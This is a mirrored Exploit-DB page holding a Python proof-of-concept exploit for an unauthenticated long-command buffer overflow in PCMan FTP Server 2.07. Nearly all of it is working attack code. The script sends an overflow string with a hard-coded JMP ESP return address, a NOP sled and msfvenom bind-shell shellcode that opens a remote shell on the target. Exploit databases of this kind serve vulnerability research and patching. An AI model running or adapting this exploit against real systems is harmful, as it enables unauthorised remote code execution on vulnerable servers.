PCMan FTP Server 2.07 – Remote Buffer Overflow

  • 作者: Sumit
    日期: 2014-02-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/31789/
  • # Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
    # Date: Feb 19, 2014
    # Exploit Author: Sumit
    # Version: 2.07
    # Tested on: Windows XP Professional SP3
    # Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
    #
    
    import socket
    import datetime
    
    """
    You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
    2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    """
    
    host = '192.168.213.10'
    
    d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
    for i in range(len(d)): d[i] = str(int(d[i]))
    d = '/'.join(d)	# Finally we got the date
    
    # msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
    shellcode = (
    "\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
    "\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
    "\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
    "\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
    "\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
    "\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
    "\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
    "\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
    "\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
    "\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
    "\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
    "\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
    "\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
    "\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
    "\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
    "\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
    "\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
    "\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
    "\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
    "\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
    "\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
    "\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
    "\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
    "\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
    "\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
    "\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
    "\x18\x37\x4e\x32")
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 21))
    
    nop = '\x90'*50
    eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
    myip = s.getsockname()[0]
    padding = 'A' * (2029 - (len(d) + len(myip)))
    
    buf = padding + eip + nop + shellcode
    
    s.send('%s\r\n' % (buf))
    s.recv(1024)
    print 'Payload sent'
    s.close()